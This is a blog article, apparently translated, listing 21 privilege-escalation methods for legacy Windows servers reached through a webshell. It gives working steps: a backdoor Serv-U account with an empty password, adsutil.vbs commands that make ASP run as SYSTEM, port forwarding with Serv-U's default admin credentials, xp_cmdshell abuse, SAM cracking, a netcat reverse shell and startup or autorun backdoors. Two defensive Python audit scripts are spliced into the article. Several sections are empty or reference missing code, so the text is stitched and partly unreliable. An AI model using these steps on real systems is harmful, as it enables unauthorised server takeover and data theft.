21 methods of escalating privileges on a server from a webshell, explained in detail

1. Radmin connection
The condition is that you have enough privileges and the other party does not even have a firewall. Pack a Radmin server, run it so that it opens its listening port on the target, then connect to that port with the Radmin client. I have never succeeded with this.

2. pcAnywhere
Download his CIF file from C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere and load it into a local pcAnywhere installation.

3. SAM cracking
Take the SAM from C:\WINNT\system32\config and crack it.

4. Serv-U password capture
Look in C:\Documents and Settings\All Users\Start Menu\Programs\ for the Serv-U shortcut and check its properties locally to learn the install path, then check whether you can jump to that directory.
Once inside, if you have permission to modify ServUDaemon.ini, add a user with an empty password:
  [USER=WekweN|1]
  PassWord=
  HomeDir=c:\
  TimeOut=600
  Maintenance=System
  Access1=C:\|RWAMELCDP
  Access1=d:\|RWAMELCDP
  Access1=f:\|RWAMELCDP
  SKEYValues=
This user has the highest privilege; then we can ftp in and use quote site exec xxx to escalate.
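As an added defender's check (not from the original article), the following Python audits a ServUDaemon.ini for accounts shaped like the one above: an empty PassWord, Maintenance=System, or writable access to a drive root. The sample ini is constructed.

```python
import re

# Constructed sample ServUDaemon.ini: a normal account plus an injected-looking one.
SAMPLE_INI = """\
[USER=ftpuser|1]
PassWord=ck5A2F3B6D
Access1=d:\\ftproot|RL
[USER=WekweN|1]
PassWord=
HomeDir=c:\\
Maintenance=System
Access1=C:\\|RWAMELCDP
Access1=d:\\|RWAMELCDP
"""

DRIVE_ROOT = re.compile(r"^[A-Za-z]:\\?$")  # a bare drive root such as C:\ or d:

def parse_users(ini_text):
    """Return {username: {key: [values]}} per [USER=name|n] section; lists because Serv-U repeats keys."""
    users, current = {}, None
    for raw in ini_text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            body = line[1:-1]
            is_user = body.upper().startswith("USER=")
            current = users.setdefault(body[5:].split("|", 1)[0], {}) if is_user else None
        elif current is not None and "=" in line:
            key, _, value = line.partition("=")
            current.setdefault(key.strip().lower(), []).append(value.strip())
    return users

def suspicious_accounts(ini_text):
    """Return {username: [findings]} for accounts that match the injected pattern."""
    findings = {}
    for name, keys in parse_users(ini_text).items():
        issues = []
        if any(v == "" for v in keys.get("password", [""])):
            issues.append("empty password")
        if any(v.lower() == "system" for v in keys.get("maintenance", [])):
            issues.append("Maintenance=System (full server administration)")
        for entry in keys.get("access1", []):
            path, _, rights = entry.partition("|")
            if DRIVE_ROOT.match(path) and "W" in rights.upper():
                issues.append("writable drive root " + path)
        if issues:
            findings[name] = issues
    return findings
```

Run it against the ini you keep under version control or a backup; any account it flags that you did not create is worth a closer look.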

5. c:\winnt\system32\inetsrv\data\
This directory is also under Everyone full control by default. All we need to do is upload the privilege-escalation tool there and execute it.

6. Serv-U overflow escalation

7. Run cscript
Run "cscript C:\Inetpub\AdminScripts\adsutil.vbs get w3svc/InProcessIsapiApps" to see the privileged (in-process) ISAPI list.
The privileged DLLs listed are: idq.dll httpext.dll httpodbc.dll ssinc.dll msw3prt.dll
Add asp.dll to the privileged family.
asp.dll is located at c:\winnt\system32\inetsrv\asp.dll (the location may differ between machines).
Now we add it:
  cscript adsutil.vbs set /W3SVC/InProcessIsapiApps "C:\WINNT\system32\idq.dll" "C:\WINNT\system32\inetsrv\httpext.dll" "C:\WINNT\system32\inetsrv\httpodbc.dll" "C:\WINNT\system32\inetsrv\ssinc.dll" "C:\WINNT\system32\msw3prt.dll" "c:\winnt\system32\inetsrv\asp.dll"
You can use cscript adsutil.vbs get /W3SVC/InProcessIsapiApps to check whether it has been added.

8. Startup script escalation
Write a .bat or .vbs into C:\Documents and Settings\All Users\Start Menu\Programs\Startup.

9. VNC
This one is from Xiaohua's article, HOHO.
By default the VNC password is stored in the registry at HKCU\Software\ORL\WinVNC3\Password.
We can use vncx4 to crack it; vncx4 is easy to use. Just run at the command line:
  c:\>vncx4 -W
then type in each byte of the hexadecimal registry value above in sequence, pressing Enter once for each.

10. NC escalation
Give the other party an nc, but the condition is that you have enough permission to run it; then bounce a shell back to your own machine, HOHO, OK.

11. Social engineering: Guest escalation
It is easy to check his details. Generally speaking, once you see the account, try to guess the password; the user's password may be the same as his QQ number, e-mail account, or mobile phone number. Give it a try, HOHO.
This tutorial does not explain it in detail.

12. IPC$ null session
If the other party is really careless, scan his IPC$; if you are lucky he still has a weak password.

13. Service replacement
Needless to say, right? Personally I find it quite complicated.

14. autorun.inf
autorun=xxx.exe (write the exe yourself, HOHO); set the read-only, system and hidden attributes and copy it to any drive. Don't rely on it.

15. desktop.ini and Folder.htm
First, create a folder locally; the name does not matter. Enter it, right-click on the blank space, choose "Customize This Folder" (this seems not to work on XP), and click through with the defaults. When finished you will see two more items in the directory: a Folder Settings directory and a desktop.ini file. (If you cannot see them, first untick "Hide protected operating system files".) Then find Folder.htm inside the Folder Settings directory, open it in Notepad and add the following code anywhere:
Then put your backdoor file in the Folder Settings directory, upload this directory together with desktop.ini to any directory on the other party's machine, and the backdoor will execute as soon as the administrator browses that directory.

16. Serv-U overwrite
Install Serv-U locally, overwrite your own ServUDaemon.ini with the ServUDaemon.ini downloaded from him, and restart Serv-U; all of his configuration is then identical on your copy.

17. Serv-U port forwarding
43958 is the local management port of Serv-U. Upload FPipe.exe and run: fpipe -v -l 3333 -r 43958 127.0.0.1, which maps port 3333 to port 43958. Then install Serv-U locally, create a new server, fill in the other party's IP address, with the account LocalAdministrator and the password #1@$ak#.1k;0@p. Once connected you can manage his Serv-U.

18. SQL account password disclosure
If the other party runs MSSQL Server, we can add an administrator account through the SQL connection (the credentials can be read from the ASP file that connects to the database), because MSSQL runs with SYSTEM permission by default.
If the other party has not removed xp_cmdshell: use Sqlexec.exe, fill in the other party's IP address in the Host field and the obtained user name and password in User and Pass, with Format set to Select xp_cmdshell "%s". Click Connect; once connected you can enter the CMD command you want in the CMD column.

19. asp.dll
Because asp.dll is located at c:\winnt\system32\inetsrv\asp.dll (the location may differ between machines), we add it with:
  cscript adsutil.vbs set /W3SVC/InProcessIsapiApps "C:\WINNT\system32\idq.dll" "C:\WINNT\system32\inetsrv\httpext.dll" "C:\WINNT\system32\inetsrv\httpodbc.dll" "C:\WINNT\system32\inetsrv\ssinc.dll" "C:\WINNT\system32\msw3prt.dll" "c:\winnt\system32\inetsrv\asp.dll"
Now you can use cscript adsutil.vbs get /W3SVC/InProcessIsapiApps to check whether it has been added.
Note on get and set: one views the list and the other sets it. Also, you need to run the above from the C:\Inetpub\AdminScripts> directory.
If you are an administrator and your machine has been escalated to SYSTEM by this method, the way to prevent it is to take asp.dll out of the privileged family, that is, use the set command to overwrite the list that was just changed.
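An added example, not from the article, covering the adsutil.vbs checks of sections 7 and 19 from the administrator's side: it parses the output of the get command, diffs the in-process list against the five default DLLs, and builds the set command that drops the extra entry, which is the prevention step described above. The output layout is an assumption; only the quoted paths are used.

```python
import re

# The five DLLs the article lists as the default in-process ISAPI set.
BASELINE = {"idq.dll", "httpext.dll", "httpodbc.dll", "ssinc.dll", "msw3prt.dll"}

# Constructed sample of the 'get' output after asp.dll was appended; the exact
# layout adsutil.vbs prints is an assumption, only the quoted paths matter.
SAMPLE_OUTPUT = r'''
InProcessIsapiApps              : (LIST) (6 Items)
  "C:\WINNT\system32\idq.dll"
  "C:\WINNT\system32\inetsrv\httpext.dll"
  "C:\WINNT\system32\inetsrv\httpodbc.dll"
  "C:\WINNT\system32\inetsrv\ssinc.dll"
  "C:\WINNT\system32\msw3prt.dll"
  "c:\winnt\system32\inetsrv\asp.dll"
'''

QUOTED_PATH = re.compile(r'"([^"]+)"')

def dll_name(path):
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()

def parse_in_process_list(output):
    """Return the quoted DLL paths in adsutil 'get' output, in order."""
    return [m.group(1) for m in QUOTED_PATH.finditer(output)]

def audit_in_process(output, baseline=BASELINE):
    """Return (added, missing): paths not in the baseline (asp.dll here means ASP
    pages run inside inetinfo.exe as SYSTEM) and baseline names that are gone."""
    paths = parse_in_process_list(output)
    added = [p for p in paths if dll_name(p) not in baseline]
    missing = sorted(baseline - {dll_name(p) for p in paths})
    return added, missing

def restore_command(output, baseline=BASELINE, script=r"C:\Inetpub\AdminScripts\adsutil.vbs"):
    """Build the 'set' command from section 19 that rewrites the list with only
    the baseline entries, i.e. the remediation the article describes."""
    keep = [p for p in parse_in_process_list(output) if dll_name(p) in baseline]
    return "cscript %s set /W3SVC/InProcessIsapiApps %s" % (
        script, " ".join('"%s"' % p for p in keep))
```

Schedule the get command and feed its output to audit_in_process; a non-empty added list is the signal that someone changed the in-process set.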

20. Magic Winmail
The prerequisite is that you have a webshell.

21. DBO

Original article; when reprinting please credit: reprinted from Seven Travelers Blog

Permanent link to this article: https://www.qxzxp.com/4225.html
